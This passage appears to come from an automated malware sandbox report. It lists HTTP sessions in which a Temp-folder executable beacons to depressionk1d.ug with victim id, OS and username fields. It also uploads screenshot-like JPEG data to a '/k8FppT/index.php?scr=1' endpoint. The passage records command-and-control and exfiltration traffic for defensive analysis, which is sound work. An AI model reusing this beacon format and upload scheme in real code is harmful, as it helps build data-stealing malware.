                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          55192.168.2.449839178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:33.743364096 CET4574OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:33.768182993 CET4574INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:33 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          56192.168.2.449840178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:33.810405970 CET4575OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:33.810420990 CET4575OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:33.810738087 CET4585OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:33.810869932 CET4588OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:33.833108902 CET4593OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:33.833153963 CET4599OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:23:33.833192110 CET4604OUTData Raw: 8a 5a 5c 53 24 4c 52 81 4a 05 2e 29 89 b1 b4 62 9f 8a 31 45 85 71 98 a5 c5 3b 14 b8 a7 60 b8 dc 51 b6 9f 8a 5c 53 b0 ae 33 6d 1b 6a 4d b4 6d a7 61 73 11 ed a3 6d 4b 8a 36 d1 ca 1c c4 3b 28 2b 53 ed a4 db 4f 94 39 88 0a d3 4a d5 82 b4 85 2a 79 46
                          Data Ascii: Z\S$LRJ.)b1Eq;`Q\S3mjMmasmK6;(+SO9J*yFV+M)VJJTVI)HVV+L)RZ9ZiiSL"""RM"&0LSIRUE!PwE!Ph7CJ*|lx_BJ:5i1|xss7RM
                          Nov 12, 2021 22:23:33.833244085 CET4607OUTData Raw: 7d a9 0a 66 a7 90 6a a1 9e d1 54 46 2a d3 68 b3 51 18 aa 5d 33 48 d5 33 4c 75 1b 47 c5 69 34 35 13 43 58 ca 99 b4 6a 99 6f 15 40 d1 d6 a3 c5 50 3c 55 cf 3a 67 44 2a 99 a5 71 4c 2b 57 9e 2a 81 d2 b0 94 2c 74 46 77 2a 91 4d c5 4e 56 98 56 b3 71 34
                          Data Ascii: }fjTF*hQ]3H3LuGi45CXjo@P<U:gD*qL+W*,tFw*MNVVq4R#HE&*lUc~)Q`JQI\@($2iZm.+"o7;0ROfT(%(p vi)(!L\PzR8\hC@cMa(sQN,Uzm]GCd@S*t+\
                          Nov 12, 2021 22:23:33.833300114 CET4614OUTData Raw: 06 8d be fa 03 52 e6 d0 29 eb a9 9d b6 8d 80 f6 ad 51 69 6f 2f dc 62 b4 36 95 2f 54 65 6a 9f 6d 1e a6 8a 32 7a a3 24 c0 08 a8 5e d3 22 b5 9a ce 68 fe fc 4d 51 f9 5e d5 4a a4 58 b9 e5 1d cc 29 6c fd ab 3e 7b 2f 6a eb 0d be e1 d2 a0 92 c7 23 ee 9a
                          Data Ascii: R)Qio/b6/Tejm2z$^"hMQ^JX)l>{/j#OFMLIMJtb]i8j:1Tek@,W$DfCt3 ?s)WEpAIo3o)kKXdPt-^6B=yyFxkfy
                          Nov 12, 2021 22:23:33.855658054 CET4616OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8
                          Nov 12, 2021 22:23:33.856045961 CET4625OUTData Raw: 03 c5 28 3c d3 41 a5 26 98 ac 48 0d 3b 39 a8 f7 52 83 54 89 68 7e 69 41 a6 e6 8a a2 6c 48 0d 3b 35 18 a7 53 4c 96 87 e6 9d 9a 8f 34 a0 fb d5 5c 9b 12 03 4e 06 a2 06 9c 0d 32 5a 25 cd 00 d3 33 4a 1a 98 ac 49 9a 01 a6 73 4f 14 c9 b0 e1 52 2f 15 18
                          Data Ascii: (<A&H;9RTh~iAlH;5SL4\N2Z%3JIsOR/2.iY2,M54h<3<SsLICS3OwFX7TwR'}@;4L$*i<}89iAqBxZvO(n??3!T6PY?G:nf;r
                          Nov 12, 2021 22:23:33.903333902 CET4685INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:33 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          57192.168.2.449841178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:33.900875092 CET4684OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:33.928198099 CET4685INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:33 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          58192.168.2.449842178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:34.072469950 CET4686OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:34.107686043 CET4686INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:34 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          59192.168.2.449843178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:34.242913961 CET4687OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:34.268815994 CET4687INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:34 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0
                          Nov 12, 2021 22:23:34.310746908 CET4688OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:34.311415911 CET4688OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:34.311439991 CET4698OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:34.311537981 CET4701OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:34.334235907 CET4711OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:34.334290028 CET4722OUTData Raw: 8a 5a 5c 53 24 4c 52 81 4a 05 2e 29 89 b1 b4 62 9f 8a 31 45 85 71 98 a5 c5 3b 14 b8 a7 60 b8 dc 51 b6 9f 8a 5c 53 b0 ae 33 6d 1b 6a 4d b4 6d a7 61 73 11 ed a3 6d 4b 8a 36 d1 ca 1c c4 3b 28 2b 53 ed a4 db 4f 94 39 88 0a d3 4a d5 82 b4 85 2a 79 46
                          Data Ascii: Z\S$LRJ.)b1Eq;`Q\S3mjMmasmK6;(+SO9J*yFV+M)VJJTVI)HVV+L)RZ9ZiiSL"""RM"&0LSIRUE!PwE!Ph7CJ*|lx_BJ:5i1|xss7RM
                          Nov 12, 2021 22:23:34.335625887 CET4727OUTData Raw: 1d c8 50 67 31 ec 90 15 65 23 95 c0 3f 74 0e 46 7d eb 95 8f 52 bf 8a dd ed e3 bd b9 48 5d 76 bc 6b 2b 05 61 e8 46 70 45 74 47 0d 2b dd b2 25 88 8d ac 91 56 92 8a 2b b4 e4 14 51 45 14 c0 2b e9 3f 83 cc bf f0 85 6d c8 dc 26 04 8f 63 1a 7f 81 af 9b
                          Data Ascii: Pg1e#?tF}RH]vk+aFpEtG+%V+QE+?m&c+oK>\Xr;+c*G:5)vRK[_f}+/5KHlb}(z9rZa{6>(Ucw5<OAK')uU+/ts`
                          Nov 12, 2021 22:23:34.357436895 CET4743OUTData Raw: 83 14 62 81 45 30 b8 53 85 36 94 1a 04 28 eb 4e 1d e9 b4 b4 d0 85 a2 8a 5a 64 8b 8a 4c 52 81 4a 06 29 d8 06 e2 8a 53 49 40 20 a2 92 8a 40 14 b4 52 1a 00 5a 51 40 a2 98 0b 4b 49 4a 29 88 5a 33 49 45 08 43 b3 40 eb 40 a3 35 40 3a 8a 6e 68 14 13 61
                          Data Ascii: bE0S6(NZdLRJ)SI@ @RZQ@KIJ)Z3IEC@@5@:nhaii(0RRZJZhLS@C:)BSiEQ,uQNuQ#<*1OH<RMU:uM~itj-f8dvjM3N8h<8isLlJ8Pi.h0Pib@iA
                          Nov 12, 2021 22:23:34.357515097 CET4759OUTData Raw: 31 7d 6a 99 8a 31 4e 18 ad 91 a4 47 ea 69 46 93 10 ee 69 fd 5e 64 bc 55 33 1b 8a 38 ad bf ec 98 fd 4d 28 d2 62 f5 34 fe af 31 7d 6a 99 89 c5 2e 05 6d 8d 26 2f 53 4e 1a 4c 5e f4 fe af 22 5e 2a 99 89 8a 36 d6 e7 f6 54 5e f4 bf d9 51 7b d5 7d 5e 42
                          Data Ascii: 1}j1NGiFi^dU38M(b41}j.m&/SNL^"^*6T^Q{}^B3m(Z4W?Z/#X]~{yGw>ovZ)3:j1X3/y,0814k/&u!VKte,m5oCKJ)gCUe}
                          Nov 12, 2021 22:23:34.357584953 CET4770OUTData Raw: 6a 64 f3 0c c5 2e 2a 50 86 94 25 04 f3 11 81 4f 02 9e 14 53 c0 5a 64 b9 11 85 a7 84 a7 82 a3 bd 1e 6a 0f e2 14 10 db 62 04 a7 04 a6 9b 98 87 f1 52 7d b6 31 d3 9a 77 42 e5 9b e8 4c 12 94 25 56 37 cb d8 53 7e da 4f 41 45 c3 d9 cc bd b7 14 a0 56 7f
                          Data Ascii: jd.*P%OSZdjbR}1wBL%V7S~OAEVD+RQVW1=w}ExURQa{"h[sFM7w9J~7xqBhh$\kc%5X5.w/YsFr-IM}b]\G
                          Nov 12, 2021 22:23:34.358581066 CET4780OUTData Raw: 4d ef 45 30 1d 9a 5c d3 69 69 a1 0e 14 bd e9 a2 97 34 ee 21 d9 a2 9b 9a 33 4c 56 1d 9a 5c d3 33 4b 4c 56 1e 29 c2 9a 3b 52 8a 68 4c 5a 5a 4a 29 88 5a 29 28 34 08 5a 5a 4a 29 80 b9 a5 a4 a2 80 14 1a 70 a6 52 8a 68 43 fb 52 d3 41 a5 aa 24 78 34 b4
                          Data Ascii: ME0\ii4!3LV\3KLV);RhLZZJ)Z)(4ZZJ)pRhCRA$x4iiE474fNPH(N5Dp4id8U!N$qXp4gLZB+hEQf4s).MOZhjvsUqXwJ\hyM2lIK`4<Pj=n+
                          Nov 12, 2021 22:23:34.406796932 CET4795INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:34 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          6192.168.2.449787178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:08.344082117 CET1268OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:08.344213009 CET1268OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:08.344470024 CET1278OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:08.344696999 CET1281OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:08.366966963 CET1283OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:08.367012978 CET1286OUTData Raw: 7d 09 7c 37 64 c0 4c 62 b2 31 33 74 ce dd a3 35 e6 92 6a be 26 89 ee 12 6b fd 5d 1e db fd 7a bc b2 83 17 38 f9 b2 7e 5e 48 1c f7 35 9d 75 7f 79 7d b7 ed 77 73 dc 6c ce df 3a 42 fb 73 d7 19 fa 54 41 4d 38 b4 f4 45 4a 51 b3 d3 56 6b 26 b7 0b 7d f8
                          Data Ascii: }|7dLb13t5j&k]z8~^H5uy}wsl:BsTAM8EJQVk&}~5^U_TuG`k<"Y0[djXI$cauw>Iz}kv{=20i)Om5!erlyA7qo.C[c?#\|R^Y]
                          Nov 12, 2021 22:23:08.367077112 CET1291OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:23:08.367202044 CET1297OUTData Raw: 8a 5a 5c 53 24 4c 52 81 4a 05 2e 29 89 b1 b4 62 9f 8a 31 45 85 71 98 a5 c5 3b 14 b8 a7 60 b8 dc 51 b6 9f 8a 5c 53 b0 ae 33 6d 1b 6a 4d b4 6d a7 61 73 11 ed a3 6d 4b 8a 36 d1 ca 1c c4 3b 28 2b 53 ed a4 db 4f 94 39 88 0a d3 4a d5 82 b4 85 2a 79 46
                          Data Ascii: Z\S$LRJ.)b1Eq;`Q\S3mjMmasmK6;(+SO9J*yFV+M)VJJTVI)HVV+L)RZ9ZiiSL"""RM"&0LSIRUE!PwE!Ph7CJ*|lx_BJ:5i1|xss7RM
                          Nov 12, 2021 22:23:08.367243052 CET1301OUTData Raw: 7d a9 0a 66 a7 90 6a a1 9e d1 54 46 2a d3 68 b3 51 18 aa 5d 33 48 d5 33 4c 75 1b 47 c5 69 34 35 13 43 58 ca 99 b4 6a 99 6f 15 40 d1 d6 a3 c5 50 3c 55 cf 3a 67 44 2a 99 a5 71 4c 2b 57 9e 2a 81 d2 b0 94 2c 74 46 77 2a 91 4d c5 4e 56 98 56 b3 71 34
                          Data Ascii: }fjTF*hQ]3H3LuGi45CXjo@P<U:gD*qL+W*,tFw*MNVVq4R#HE&*lUc~)Q`JQI\@($2iZm.+"o7;0ROfT(%(p vi)(!L\PzR8\hC@cMa(sQN,Uzm]GCd@S*t+\
                          Nov 12, 2021 22:23:08.367283106 CET1304OUTData Raw: e4 77 a7 cd 17 ba 17 2c 96 cc b2 74 b8 4f 47 a6 9d 20 ff 00 0b d3 04 cc 3b d3 d6 e1 c7 43 4e d4 df 41 5e aa ea 44 74 a9 87 4c 1a 89 b4 fb 85 3f 70 d5 f1 76 e3 bd 4a 97 8d de 8f 67 49 ec 1e d6 aa 32 4d ac c3 f8 0f e5 4d 31 38 ea a6 b7 85 da 9e ab
                          Data Ascii: w,tOG ;CNA^DtL?pvJgI2MM18NobvZ?-4Z?A_V}}j=Qvm*[?%')biHm&QQ:u)}JXV>~T)F1Shaq8p+IpH%:S AO
                          Nov 12, 2021 22:23:08.367300034 CET1306OUTData Raw: 8c 52 f9 c3 f8 51 45 17 64 ba 9e 45 41 1c a7 a2 13 f8 54 8b 6f 31 fe 1c 7d 6a 73 33 f6 c0 a6 99 1f fb c6 8d 49 e7 6c 05 ab 77 75 1f 8d 3c 5b a0 eb 27 e5 51 ee 3e b4 80 d3 b3 25 dd 96 36 40 a7 ef 13 4e df 0a f4 50 6a b6 68 a3 90 9b 16 85 d0 1f 75
                          Data Ascii: RQEdEATo1}js3Ilwu<['Q>%6@NPjhuU\^#,{~`4#7V'QG${*5<_[W/V.>Cd;1^!gGF=nl5}NPF;m)hV(\$|.<oZO7Z$dW
                          Nov 12, 2021 22:23:08.438146114 CET1377INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:08 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          60192.168.2.449844178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:34.401583910 CET4795OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:34.426945925 CET4796INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:34 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          61192.168.2.449845178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
